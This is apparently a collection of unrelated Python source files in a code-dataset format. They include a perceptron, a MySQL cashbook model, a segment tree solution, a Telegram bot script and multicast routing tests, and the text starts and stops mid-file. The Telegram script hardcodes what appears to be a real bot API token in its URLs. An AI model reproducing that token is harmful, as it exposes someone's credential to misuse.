__init__(self, length, i=0, h=0.75):\n        self.h = h  # Bias (threshold shift)\n        self.i = i  # Store the index of this perceptron\n        self.weight = init_weight(length)  # Initialize the weights of the current perceptron\n\n    # Training function\n    def train(self, X, number, epochs=1, n=1):\n        target = read_target(number)  # Read the output we want from the current perceptron\n        for epoch in range(epochs):  # Iterate over every epoch\n            net_y = net(X, self.weight) + ((-1) * self.h)  # Sum the products Xi*Wi\n            z = activation_fun(net_y, self.h)  # Perceptron prediction (step function)\n            err = target[self.i] - z  # Compute the error\n            for i in range(len(self.weight)):  # Walk over all the weights and adjust them\n                self.weight[i] += err * X[i] * n\n            self.h += err * (-1) * n  # Adjust the bias as well\n\n    # Prediction function\n    def get_answer(self, X):\n        net_y = net(X, self.weight) - self.h  # Sum the products Xi*Wi\n        z = activation_fun(net_y, self.h)  # Perceptron prediction (step function)\n        return z\n","sub_path":"lab_1/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"513677678","text":"# #SUMMARY\r\n# Write a program that reads all the files you created during\r\n# feriechallenge - it searches local directories or connects to Github for this purpose.\r\n# Try to hardcode as little as possible and, for example, do not list all the files by hand\r\n# Then, using your way of cataloguing the programs, the tool reads\r\n# and displays the following information:\r\n# - for how many of the 10 tasks you wrote code\r\n# - the number of lines of code written in each task (not counting empty ones!)\r\n# as well as the total number of lines\r\n# - the number of unique words used in all the programs and the most frequent word\r\n# - the list and number of keywords used during the whole challenge (use the keyword module)\r\n# - the list and number of modules imported in all the programs\r\n# Suggested extension: Just be brave and show off the output of your program!\r\n# - publish a post with the #feriechallenge tag and leave a like on our page,\r\n# we will be glad 🙂 You can of course also include some extra statistics.\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport keyword\r\n\r\nglobal_content = []\r\n\r\n\r\ndef filtered_code(content):\r\n    filtered = []\r\n    for line in content:\r\n        if str(line).startswith('#'):\r\n            continue\r\n        if len(line) < 2:\r\n            continue\r\n        else:\r\n            filtered.append(line.strip())\r\n    return filtered\r\n\r\n\r\ndef word_count(content):\r\n    wordsAndCount = {}\r\n    \r\n    for line in content:\r\n        words_list = str(line).split()\r\n        for word in words_list:\r\n            wordd = word.strip(\"[](),.+-//='\")\r\n            if wordd.isalpha():\r\n                try:\r\n                    wordsAndCount[wordd] += 1\r\n                except KeyError:\r\n                    wordsAndCount[wordd] = 1\r\n            else:\r\n                continue\r\n    return wordsAndCount\r\n\r\n\r\ndef key_word_count(content):\r\n    keyWordsCount = {}\r\n    \r\n    for line in content:\r\n        words_list = str(line).split()\r\n        for word in words_list:\r\n            wordd = word.strip(\"[](),.+-=//'\")\r\n            if keyword.iskeyword(wordd):\r\n                try:\r\n                    keyWordsCount[wordd] += 1\r\n                except KeyError:\r\n                    keyWordsCount[wordd] = 1\r\n            else:\r\n                continue\r\n\r\n    return keyWordsCount\r\n\r\ndef imported_modules(content):\r\n    importedModules={}\r\n    for lines in content:\r\n        for line in lines:\r\n            if str(line).startswith('import'):\r\n                word = 
line[7:]\r\n try:\r\n importedModules[word] += 1\r\n except KeyError:\r\n importedModules[word] = 1\r\n if str(line).startswith('from'):\r\n word = line[5:str(line).index('import')-1]\r\n try:\r\n importedModules[word] += 1\r\n except KeyError:\r\n importedModules[word] = 1\r\n else:\r\n continue\r\n return importedModules\r\n \r\nbaseDir = 'C:\\\\Projects\\\\Python\\\\HardCode\\\\scripts\\\\'\r\nonlyfiles = [f for f in listdir(baseDir) if isfile(join(baseDir, f)) if f.upper().endswith('.PY')]\r\ni = 0\r\nsummaryLine = 0\r\nsummaryLineCode = 0\r\n\r\nfor file in onlyfiles:\r\n i += 1\r\n print('\\n', '-'*10, i, file, '-'*10)\r\n with open(baseDir+file, \"r\") as file:\r\n content = file.readlines()\r\n summaryLine += len(content)\r\n print(len(content), ': number of lines')\r\n filtered = filtered_code(content)\r\n summaryLineCode += len(filtered)\r\n print(len(filtered), ': number of code lines', '\\n', '-'*40)\r\n global_content.append(filtered)\r\n \r\nwords = word_count(global_content)\r\nmodules = imported_modules(global_content)\r\ninverse = {value: key for key, value in words.items()}\r\n\r\nprint('imported modules:', modules)\r\nprint ('keywords: ',key_word_count(global_content))\r\nprint('-'*10)\r\nprint('summary lines = ', summaryLine)\r\nprint('summary lines code = ', summaryLineCode)\r\nprint('Unique words in file: ', len(words))\r\nprint('max counted word: ', inverse[max(inverse.keys())],'-',max(inverse.keys()))\r\nprint('Imports count:', words['import'])\r\n","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"168242334","text":"import os\nimport json\nimport numpy as np\nimport random\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import models, transforms\n\nfrom PIK3CA_mutation.data_reader import ClsDataset\nfrom PIK3CA_mutation.utils import get_modelpath, net_prediction_oneshop, patient_res_m3_oneshop, save_results\n\n\ndef start_model(datapath, sampling_file, root_dir, model_type, seed=2020, gpu=\"0\", net=\"resnet18\",\n num_classes=2, num_workers=4, batch_size=256, norm_mean=[0.8201, 0.5207, 0.7189],\n norm_std=[0.1526, 0.1542, 0.1183]):\n \"\"\"\n Arguments:\n model_type: 'PIK3CA_Mutation', 'BLIS', 'IM', 'LAR', 'MES'\n net: resnet18, alexnet, resnet34, inception_v3\n\n Results:\n root_dir: ./FUSCC001_models/\n patch.json: ${root_dir}/${model_type}/patch.json\n patch.npz: ${root_dir}/${model_type}/patch.npz\n patient.json: ${root_dir}/${model_type}/patient.json\n patient.npz: ${root_dir}/${model_type}/patient.npz\n \"\"\"\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n preprocess = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.ToTensor(), # Operated on original image, rewrite on previous transform.\n transforms.Normalize(norm_mean, norm_std)])\n\n print('Loading data...')\n testset = ClsDataset(sampling_file, datapath, preprocess)\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=num_workers)\n\n net = getattr(models, net)(pretrained=False, num_classes=num_classes)\n modelpath = get_modelpath(model_type)\n print('Loading model...', modelpath)\n\n if len(gpu) > 1:\n net = torch.nn.DataParallel(net).cuda()\n net.load_state_dict(torch.load(modelpath)) # load the finetune weight parameters\n else:\n net = net.cuda()\n net.load_state_dict({k.replace('module.',''):v for k,v in 
torch.load(modelpath).items()})\n\n # Patch Output: patch.json / patch.npz\n scores_patch, predictions_patch, namelist_patch = net_prediction_oneshop(testloader, net, num_classes)\n\n patch_results = save_results(namelist_patch, scores_patch[:, 1], predictions_patch, num_classes)\n with open(os.path.join(root_dir, model_type, 'patch.json'), 'w') as f:\n json.dump(patch_results, f)\n\n savename_patch = os.path.join(root_dir, model_type, 'patch.npz')\n np.savez(savename_patch, key_score=scores_patch, key_binpred=predictions_patch, key_namelist=namelist_patch)\n\n # Patient Output: patient.json / patient.npz\n scores_patient, predictions_patient, namelist_patient = patient_res_m3_oneshop(scores_patch, namelist_patch, num_classes)\n patient_results = save_results(namelist_patient, scores_patient[:, 1], predictions_patient, num_classes)\n with open(os.path.join(root_dir, model_type, 'patient.json'), 'w') as f:\n json.dump(patient_results[0], f)\n \n savename_patient = os.path.join(root_dir, model_type, 'patient.npz')\n np.savez(savename_patient, key_score=scores_patient, key_binpred=predictions_patient, key_namelist=namelist_patient)\n\n with open(os.path.join(root_dir, model_type, 'prediction.json'), 'w') as f:\n results = {\n \"model\": model_type,\n \"patient\": patient_results[0],\n \"patch\": patch_results\n }\n json.dump(results, f)\n","sub_path":"PIK3CA_mutation/single_prediction.py","file_name":"single_prediction.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"392658154","text":"for num in range(1, 2):\r\n\r\n    time = []\r\n    total_flag = 0\r\n    asterisk_flag = 0\r\n    filename = \"New-Step\" + str(num) + \".txt\"\r\n    for line in reversed(list(open(filename))):\r\n        if line.startswith('Total (root+branch&cut)'):\r\n            total_flag = 1\r\n            continue\r\n\r\n        if line.startswith('*'):\r\n            asterisk_flag = 1\r\n            continue\r\n\r\n        if total_flag and asterisk_flag and line.startswith('Elapsed time'):\r\n            pos1 = line.find('=')\r\n            pos2 = line.find('sec.', pos1)\r\n            time.append((line[pos1+1:pos2]).strip())\r\n            total_flag = 0\r\n            asterisk_flag = 0\r\n\r\n    print(sum([float(time_point) for time_point in time]))\r\n","sub_path":"extract_time_new.py","file_name":"extract_time_new.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557363510","text":"\"\"\"\nDefinition of Interval.\nclass Interval(object):\n    def __init__(self, start, end):\n        self.start = start\n        self.end = end\n\"\"\"\nclass SegmentTreeNode(object):\n    def __init__(self, start, end, min):\n        self.start, self.end, self.min = start, end, min\n        self.left, self.right = None, None\n\nclass Solution:\t\n    \"\"\"\n    @param A, queries: Given an integer array and an Interval list\n                       The ith query is [queries[i-1].start, queries[i-1].end]\n    @return: The result list\n    \"\"\"\n\n    def build(self, A, start, end):\n        if start > end:\n            return\n\n        root = SegmentTreeNode(start, end, None)\n        if start != end:\n            mid = (start + end) // 2\n            root.left = self.build(A, start, mid)\n            root.right = self.build(A, mid+1, end)\n            root.min = min(root.left.min, root.right.min)\n        else:\n            root.min = A[start]\n\n        return root\n\n    def query(self, root, start, end):\n        if root.start == start and root.end == end:\n            return root.min\n\n        mid = (root.start + root.end) // 2\n        lmin, rmin = None, None\n        if start <= mid:\n            if end <= mid:\n                return self.query(root.left, start, end)\n            else:\n                lmin = 
self.query(root.left, start, mid)\n        \n        if end > mid:\n            if start > mid:\n                return self.query(root.right, start, end)\n            else:\n                rmin = self.query(root.right, mid+1, end)\n        \n        # at this point the query spans both children, so lmin and rmin are both set\n        return min(lmin, rmin)\n    \n\n\n    def intervalMinNumber(self, A, queries):\n        root = self.build(A, 0, len(A)-1)\n\n        res = []\n        for query in queries:\n            res.append(self.query(root, query[0], query[1]))\n\n        return res\n    \nif __name__ == '__main__':\n    s = Solution()\n    s.intervalMinNumber([1, 2, 7, 8, 5], [[1,2],[0,4],[2,4]])","sub_path":"SegmentTree/IntervalMinimumNumber.py","file_name":"IntervalMinimumNumber.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"478397494","text":"import MySQLdb\nimport datetime\nfrom decimal import Decimal\n\nfrom db import DBConnector\nfrom model.project import project\n\nclass cashbook:\n    \"\"\"Cash book model\"\"\"\n\n    def __init__(self):\n        self.attr = {}\n        self.attr[\"id\"] = None\n        self.attr[\"user_id\"] = None\n        self.attr[\"ym\"] = None\n        self.attr[\"date\"] = None\n        self.attr[\"summary\"] = None\n        self.attr[\"detail\"] = None\n        self.attr[\"income\"] = None\n        self.attr[\"expenses\"] = None\n        self.attr[\"amount\"] = None\n        self.attr[\"last_updated\"] = None\n\n    @staticmethod\n    def migrate():\n\n        # Connect to the database and create a cursor\n        with DBConnector(dbName=None) as con, con.cursor() as cursor:\n            # Create the database\n            cursor.execute('CREATE DATABASE IF NOT EXISTS db_%s;' % project.name())\n            # Switch to the created database\n            cursor.execute('USE db_%s;' % project.name())\n            # Initialize the table (DROP)\n            cursor.execute('DROP TABLE IF EXISTS table_cashbook;')\n            # Initialize the table (CREATE)\n            cursor.execute(\"\"\"\n                CREATE TABLE `table_cashbook` (\n                `id` int(11) unsigned NOT NULL AUTO_INCREMENT,\n                `user_id` int(11) unsigned NOT NULL,\n                `ym` int(11) NOT NULL,\n                `date` date NOT NULL,\n                `summary` varchar(255) DEFAULT NULL,\n                `detail` text,\n                `income` decimal(12,0) NOT NULL DEFAULT '0',\n                `expenses` decimal(12,0) NOT NULL DEFAULT '0',\n                `amount` decimal(12,0) NOT NULL DEFAULT '0',\n                `last_updated` datetime NOT NULL,\n                PRIMARY KEY (`id`),\n                KEY `user_id` (`user_id`),\n                KEY `summary` (`summary`)\n                )\"\"\")\n            con.commit()\n\n    @staticmethod\n    def db_cleaner():\n        with DBConnector(dbName=None) as con, con.cursor() as cursor:\n            cursor.execute('DROP DATABASE IF EXISTS db_%s;' % project.name())\n            con.commit()\n\n    @staticmethod\n    def find(id):\n        with DBConnector(dbName='db_%s' % project.name()) as con, \\\n                con.cursor(MySQLdb.cursors.DictCursor) as cursor:\n            cursor.execute(\"\"\"\n                SELECT *\n                FROM table_cashbook\n                WHERE id = %s;\n                \"\"\", (id,))\n            results = cursor.fetchall()\n\n        if (len(results) == 0):\n            return None\n        data = results[0]\n        cb = cashbook()\n        cb.attr[\"id\"] = data[\"id\"]\n        cb.attr[\"user_id\"] = data[\"user_id\"]\n        cb.attr[\"ym\"] = data[\"ym\"]\n        cb.attr[\"date\"] = data[\"date\"]\n        cb.attr[\"summary\"] = data[\"summary\"]\n        cb.attr[\"detail\"] = data[\"detail\"]\n        cb.attr[\"income\"] = data[\"income\"]\n        cb.attr[\"expenses\"] = data[\"expenses\"]\n        cb.attr[\"amount\"] = data[\"amount\"]\n        cb.attr[\"last_updated\"] = data[\"last_updated\"]\n        return cb\n\n    def is_valid(self):\n        return all([\n            self.attr[\"id\"] is None or type(self.attr[\"id\"]) is int,\n            self.attr[\"user_id\"] is not None and type(self.attr[\"user_id\"]) is int,\n            self.attr[\"ym\"] is not None and type(self.attr[\"ym\"]) is int and len(str(self.attr[\"ym\"])) == 6,\n            self.attr[\"date\"] is not None and type(self.attr[\"date\"]) is 
datetime.date,\n            self.attr[\"summary\"] is not None and type(self.attr[\"summary\"]) is str and len(self.attr[\"summary\"]) > 0,\n            self.attr[\"detail\"] is None or type(self.attr[\"detail\"]) is str,\n            self.attr[\"income\"] is not None and type(self.attr[\"income\"]) is Decimal,\n            self.attr[\"expenses\"] is not None and type(self.attr[\"expenses\"]) is Decimal,\n            self.attr[\"amount\"] is not None and type(self.attr[\"amount\"]) is Decimal and self.attr[\"amount\"] == self.attr[\"income\"] - self.attr[\"expenses\"],\n            self.attr[\"last_updated\"] is not None and type(self.attr[\"last_updated\"]) is datetime.datetime\n        ])\n\n\n    @staticmethod\n    def build():\n        now = datetime.datetime.now()\n        cb = cashbook()\n        # Variables that have a default should be preset to their default value\n        # Dates are also better pre-filled\n        # Fields that require user input are left as None\n        cb.attr[\"ym\"] = now.year*100 + now.month\n        cb.attr[\"date\"] = now.date()\n        #cb.attr[\"summary\"] = None\n        #cb.attr[\"detail\"] = None\n        cb.attr[\"income\"] = Decimal(0)\n        cb.attr[\"expenses\"] = Decimal(0)\n        cb.attr[\"amount\"] = Decimal(0)\n        cb.attr[\"last_updated\"] = now\n        return cb\n\n    def save(self):\n        if self.is_valid():\n            return self._db_save()\n        return False\n\n    def _db_save(self):\n        if self.attr[\"id\"] is None:\n            return self._db_save_insert()\n        return self._db_save_update()\n\n    def _db_save_insert(self):\n        with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n            # Save the data (INSERT)\n            cursor.execute(\"\"\"\n                INSERT INTO table_cashbook\n                (user_id, ym, date, summary, detail, income, expenses, amount, last_updated)\n                VALUES\n                (%s, %s, %s, %s, %s, %s, %s, %s, %s); \"\"\",\n                (self.attr[\"user_id\"],\n                self.attr[\"ym\"],\n                self.attr[\"date\"],\n                self.attr[\"summary\"],\n                self.attr[\"detail\"],\n                self.attr[\"income\"],\n                self.attr[\"expenses\"],\n                self.attr[\"amount\"],\n                '{0:%Y-%m-%d %H:%M:%S}'.format(self.attr[\"last_updated\"])))\n            \n            # Fetch the AUTO INCREMENT value generated by the INSERT\n            cursor.execute(\"SELECT last_insert_id();\")\n            results = cursor.fetchone()\n            self.attr[\"id\"] = results[0]\n\n            con.commit()\n\n        return self.attr[\"id\"]\n    \n    def _db_save_update(self):\n        with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n            # Save the data (UPDATE)\n            cursor.execute(\"\"\"\n                UPDATE table_cashbook\n                SET user_id = %s,\n                    ym = %s,\n                    date = %s,\n                    summary = %s,\n                    detail = %s,\n                    income = %s,\n                    expenses = %s,\n                    amount = %s,\n                    last_updated = %s\n                WHERE id = %s; \"\"\",\n                (self.attr[\"user_id\"],\n                self.attr[\"ym\"],\n                self.attr[\"date\"],\n                self.attr[\"summary\"],\n                self.attr[\"detail\"],\n                self.attr[\"income\"],\n                self.attr[\"expenses\"],\n                self.attr[\"amount\"],\n                '{0:%Y-%m-%d %H:%M:%S}'.format(self.attr[\"last_updated\"]),\n                self.attr[\"id\"]))\n            con.commit()\n        \n        return self.attr[\"id\"]\n\n    @staticmethod\n    def select_by_user_id(user_id):\n        with DBConnector(dbName='db_%s' % project.name()) as con, \\\n                con.cursor(MySQLdb.cursors.DictCursor) as cursor:\n            cursor.execute(\"\"\"\n                SELECT *\n                FROM table_cashbook\n                WHERE user_id = %s;\n                \"\"\", (user_id,))\n            results = cursor.fetchall()\n        \n        records = []\n        for data in results:\n            cb = cashbook()\n            cb.attr[\"id\"] = data[\"id\"]\n            cb.attr[\"user_id\"] = data[\"user_id\"]\n            cb.attr[\"ym\"] = data[\"ym\"]\n            cb.attr[\"date\"] = data[\"date\"]\n            cb.attr[\"summary\"] = data[\"summary\"]\n            cb.attr[\"detail\"] = data[\"detail\"]\n            cb.attr[\"income\"] = data[\"income\"]\n            cb.attr[\"expenses\"] = data[\"expenses\"]\n            cb.attr[\"amount\"] = data[\"amount\"]\n            cb.attr[\"last_updated\"] = data[\"last_updated\"]\n            records.append(cb)\n\n        return 
records\n    \n    def delete(self):\n        if self.attr[\"id\"] is None: return None\n        with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n            # Delete the data (DELETE)\n            cursor.execute(\"\"\"\n                DELETE FROM table_cashbook\n                WHERE id = %s; \"\"\",\n                (self.attr[\"id\"],))\n            con.commit()\n\n        return self.attr[\"id\"]\n    \n    @staticmethod\n    def _index(user_id):\n        with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n            # Return the matching ids as a list\n            cursor.execute(\"\"\"\n                SELECT id FROM table_cashbook\n                WHERE user_id = %s; \"\"\",\n                (user_id,))\n            con.commit()\n            recodes = cursor.fetchall()\n        \n        ids = [recode[0] for recode in recodes]\n        return ids\n\n    \n    @staticmethod\n    def summary(user_id, summary):\n        with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n            cursor.execute(\"\"\"\n                SELECT id\n                FROM table_cashbook\n                WHERE user_id = %s and summary = %s\n                ORDER BY date ASC;\n                \"\"\",(user_id,summary,))\n            con.commit()\n            recodes = cursor.fetchall()\n\n        cb_list = [cashbook.find(recode[0]) for recode in recodes]\n        return cb_list\n\n    @staticmethod\n    def ym(user_id, ym):\n        with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n            # Return the matching ids as a list\n            cursor.execute(\"\"\"\n                SELECT id FROM table_cashbook\n                WHERE `user_id` = %s and `ym` = %s; \"\"\",\n                (user_id, ym))\n            con.commit()\n            recodes = cursor.fetchall()\n        \n        cb_list = [cashbook.find(recode[0]) for recode in recodes]\n        return cb_list\n","sub_path":"app/model/cashbook.py","file_name":"cashbook.py","file_ext":"py","file_size_in_byte":9951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"584096121","text":"class StyleInfo:\n\n\tDELIMITER = ','\n\n\tdef __init__(self, csvData):\t\t\n\t\tself.StyleColor = csvData[0]\n\t\tself.USDEPTretail = csvData[1]\n\t\tself.DIV2 = csvData[2]\n\t\tself.DEL2 = csvData[3]\n\t\tself.Wxx2 = csvData[4]\n\t\tself.Wxx1 = csvData[5]\n\t\tself.Wxx = csvData[6]\n\t\tself.RETAILSALESINEUROSWxx2 = csvData[7]\n\t\tself.RETAILSALESINEUROSWxx1 = csvData[8]\n\t\tself.RETAILSALESINEUROSWxx = csvData[9]\n\t\tself.GMw1shortage = csvData[10]\n\t\tself.POS = csvData[11]\n\t\tself.OHStoreLC = csvData[12]\n\t\tself.OHWHSPLC = csvData[13]\n\t\tself.TTLOHLC = csvData[14]\n\t\tself.YEAR = csvData[15]\n\t\tself.Dateofextraction = csvData[16]\n\t\tself.Brand = csvData[17]\n\t\tself.numofStores = csvData[18]\n\t\tself.USConfDpt = csvData[19]\n\t\tself.Usdept = csvData[20]\n\t\tself.Usdeptdescription = csvData[21]\n\t\tself.Dpt = csvData[22]\n\t\tself.DIV = csvData[23]\n\t\tself.DEPT = csvData[24]\n\t\tself.AMSSN = csvData[25]\n\t\tself.Delivery = csvData[26]\n\t\tself.DEL = csvData[27]\n\t\tself.DELSSN = csvData[28]\n\t\tself.AMSTYLECLR = csvData[29]\n\t\tself.AMStyle = csvData[30]\n\t\tself.Amcolor = csvData[31]\n\t\tself.Firstdistrodate = csvData[32]\n\t\tself.FIRSTDISTRO = csvData[33]\n\t\tself.ESSENTIALREORDER = csvData[34]\n\t\tself.amp = csvData[35]\n\t\tself.FAB = csvData[36]\n\t\tself.BCBGStyle = csvData[37]\n\t\tself.BCBGColor = csvData[38]\n\t\tself.CLRDESC = csvData[39]\n\t\tself.CLS = csvData[40]\n\t\tself.STYLEDESC = csvData[41]\n\t\tself.Styledescription = csvData[42]\n\t\tself.FobCostEuro = csvData[43]\n\t\tself.LandedCostEuro = csvData[44]\n\t\tself.Retailprice = csvData[45]\n\t\tself.RetailpriceEuroArea = csvData[46]\n\t\tself.RTLOHSTR_NOTAX = csvData[47]\n\t\tself.RTLOHWHSPHYS = csvData[48]\n\t\tself.RTLOHTTL_NOTAX = csvData[49]\n\t\tself.UnitsOHStores = csvData[50]\n\t\tself.UnitsOHWhsAvailable = 
csvData[51]\n\t\tself.UnitsOHWhsPhysical = csvData[52]\n\t\tself.TTLUNITS = csvData[53]\n\t\tself.INSTOREAPS = csvData[54]\n\t\tself.AURSLS = csvData[55]\n\t\tself.W47 = csvData[56]\n\t\tself.W48 = csvData[57]\n\t\tself.W49 = csvData[58]\n\t\tself.W50 = csvData[59]\n\t\tself.W51 = csvData[60]\n\t\tself.W52 = csvData[61]\n\t\tself.W1 = csvData[62]\n\t\tself.W2 = csvData[63]\n\t\tself.W3 = csvData[64]\n\t\tself.WOWbuild = csvData[65]\n\t\tself.RetailSalesMTD = csvData[66]\n\t\tself.MarkdownMTD = csvData[67]\n\t\tself.UnitssalesYTD = csvData[68]\n\t\tself.RetailsalesYTD = csvData[69]\n\t\tself.SALESMD = csvData[70]\n\t\tself.MarkdownYTD = csvData[71]\n\t\tself.StoreUnitSTW3 = csvData[72]\n\t\tself.StoreUnitWOSW3 = csvData[73]\n\t\tself.YTDST = csvData[74]\n\t\tself.RetailsalesinEurosW47 = csvData[75]\n\t\tself.RetailsalesinEurosW48 = csvData[76]\n\t\tself.RetailsalesinEurosW49 = csvData[77]\n\t\tself.RetailsalesinEurosW50 = csvData[78]\n\t\tself.RetailsalesinEurosW51 = csvData[79]\n\t\tself.RetailsalesinEurosW52 = csvData[80]\n\t\tself.RetailsalesinEurosW1 = csvData[81]\n\t\tself.RetailsalesinEurosW2 = csvData[82]\n\t\tself.RetailsalesinEurosW3 = csvData[83]\n\t\tself.MarkdownInEurosW3 = csvData[84]\n\t\tself.RetailsalesinEurosW4 = csvData[85]\n\t\tself.Receiptssize2 = csvData[86]\n\t\tself.Receiptssize3 = csvData[87]\n\t\tself.Receiptssize4 = csvData[88]\n\t\tself.Receiptssize5 = csvData[89]\n\t\tself.Receiptssize6 = csvData[90]\n\t\tself.Receiptssize7 = csvData[91]\n\t\tself.Receiptssize8 = csvData[92]\n\t\tself.Receiptssize9 = csvData[93]\n\t\tself.Receiptssize10 = csvData[94]\n\t\tself.Receiptssize11 = csvData[95]\n\t\tself.Receiptssize12 = csvData[96]\n\t\tself.TOTALRECEIPTS = csvData[97]\n\t\tself.ReturnTransit = csvData[98]\n\t\tself.Shipmenttransit = csvData[99]\n\t\tself.FactorypriceEuro = csvData[100]\n\t\tself.BRAND = csvData[101]\n\t\tself.FOCUS = csvData[102]\n\t\tself.DAYEVE = csvData[103]\n\t\tself.GBB = csvData[104]\n\t\tself.SSFWMDLIST = csvData[105]\n\t\tself.x = csvData[106]\n\t\tself.x = csvData[107]\n\t\tself.x = csvData[108]\n\t\tself.SSMDLISTPP = csvData[109]\n\t\tself.MD_HARD_POS = csvData[110]\t\t\n\t\tself.MD_HARD_POS_REG = csvData[111]\n\t\tself.HARDMARK_REG = csvData[112]\n\t\tself.OLD = csvData[113]\n\t\tself.INSTORE_WHS_not_OLD = csvData[114]\n\t\tself.PE = csvData[115]\n\t\t\n\tdef reduced(self):\t\t\n\t\tsinfo = self.Brand + self.DELIMITER + self.DIV + self.DELIMITER\n\t\tsinfo += self.AMSSN + self.DELIMITER + self.Delivery + self.DELIMITER\n\t\tsinfo += self.AMStyle + self.DELIMITER + self.Amcolor + self.DELIMITER\n\t\tsinfo += self.StyleColor + self.DELIMITER + self.BCBGStyle + self.DELIMITER\n\t\tsinfo += self.BCBGColor + self.DELIMITER + self.CLRDESC + self.DELIMITER\n\t\tsinfo += self.STYLEDESC + self.DELIMITER + self.Retailprice\n\t\treturn sinfo","sub_path":"styleinfo.py","file_name":"styleinfo.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9848587","text":"import json\nimport requests\n\n\"\"\"Request https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getMe\"\"\"\n# r = requests.get(URLbot + 'getMe')\n# write_json(r.json())\n\nURL = 'https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/'\n\n\ndef write_json(data, filename = 'answer.json'):\n    \"\"\"Dump json data to a file\"\"\"\n    with open(filename, 'w') as f:\n        json.dump(data, f, indent=2,\n                  ensure_ascii=False)\n\n\ndef get_updates():\n    \"\"\" Request 
updates in the bot chat https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getUpdates\"\"\"\n    url = URL + 'getUpdates'\n    r = requests.get(url)\n    #write_json(r.json())\n    return r.json()\n\n\ndef send_message(chat_id, text = 'Test'):\n    \"\"\"Send messages to the bot chat\"\"\"\n    url = URL + 'sendMessage'\n    answer = {  # dictionary passed via the POST method\n        'chat_id': chat_id,\n        'text': text\n    }\n    r = requests.post(url, json = answer)\n    return r.json()\n\n\ndef main():\n    \"\"\"Request https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getMe\"\"\"\n    r = requests.get(URL + 'getMe')\n    write_json(r.json())\n\nif __name__ == '__main__':\n    # main()\n    r = get_updates()\n    # Parse the response from Telegram:\n    chat_id = r['result'][-1]['message']['chat']['id']\n    send_message(chat_id, 'Text')","sub_path":"testJson.py","file_name":"testJson.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"289396065","text":"'''\nCreated on Feb 9, 2016\n\n@author: alex\n'''\nimport types\nimport unittest\nimport math\n\nfrom des.entities.network_entity import NetworkEntity\nfrom des.entities.node import Node\nfrom des.event.network import NetworkEvent\nfrom pim_dm.router.router import Router\nfrom pim_dm.router.tree.downstream.interface_state import Downstream\nimport pim_dm.router.tree.downstream.state as down_sm\nimport pim_dm.router.tree.pim_assert.state as assert_sm\nfrom pim_dm.router.tree.tree_id import TreeId\nfrom pim_dm.router.tree.tree_interface import TreeInterface\nfrom pim_dm.router.tree.upstream.interface_state import Upstream\nimport pim_dm.router.tree.upstream.state as up_sm\nfrom tests.test_base import TestBase, Object\nfrom topologies import test_base_topo\n\nclass TestPIM(TestBase):\n    def setUp(self):\n        settings = Object()\n        settings.NODES = test_base_topo.pim\n\n        TestBase.setUp(self, settings=settings)\n\n        self.sim_setup()\n\n    def set_members(self, node: str, value: bool, time=None) -> None:\n        r_t = NetworkEntity.get(node)._daemons[Router.NAME]\n\n        def _set_mm():\n            r_t.set_has_members(value)\n\n        if time is None:\n            _set_mm()\n        else:\n            assert isinstance(time, (int, float))\n            self.schedule_action(time, _set_mm)\n\n    def _get_S(self) -> Node:\n        '''\n        @rtype: Node\n        '''\n        return NetworkEntity.get('S')\n\n    def _get_SG(self) -> tuple:\n        '''\n        @rtype: Node\n        '''\n        return TreeId(self._get_S(), 'g1')\n\n    def _schedule_missfire(self, time: float, rname: str, sname: str, fname:\n                           str):\n        \"\"\"\n        Schedules a msg to be \"lost\" at a given time.\n        This is done by replacing the function which sends the msg by _msg_missfire\n        \"\"\"\n\n        # so that the Join msg is not sent,\n        # but the object must exist and be instantized therefore 26 secs\n        def _msg_missfire():\n            n_r = NetworkEntity.get(rname)._daemons[Router.NAME]\n            n_t = n_r.get_tree(self._get_SG())\n            sn = NetworkEntity.get(sname)\n            n_sn = n_t._tree_ifs[sn]\n            n_sn.rprint(\"dropping message: \" + fname)\n\n            # In python methods and functions are different types.\n            # The MethodType is then necessary to bind a function to a\n            # object instance as to correctly pass 'self' to the function (or method)\n            # http://stackoverflow.com/questions/972/adding-a-method-to-an-existing-object-instance\n            setattr(n_sn, fname, types.MethodType(\n                getattr(TreeInterface, fname), n_sn))\n\n        def _set_missfire():\n            n_r = NetworkEntity.get(rname)._daemons[Router.NAME]\n            n_t = n_r.get_tree(self._get_SG())\n            sn = NetworkEntity.get(sname)\n            n_sn = 
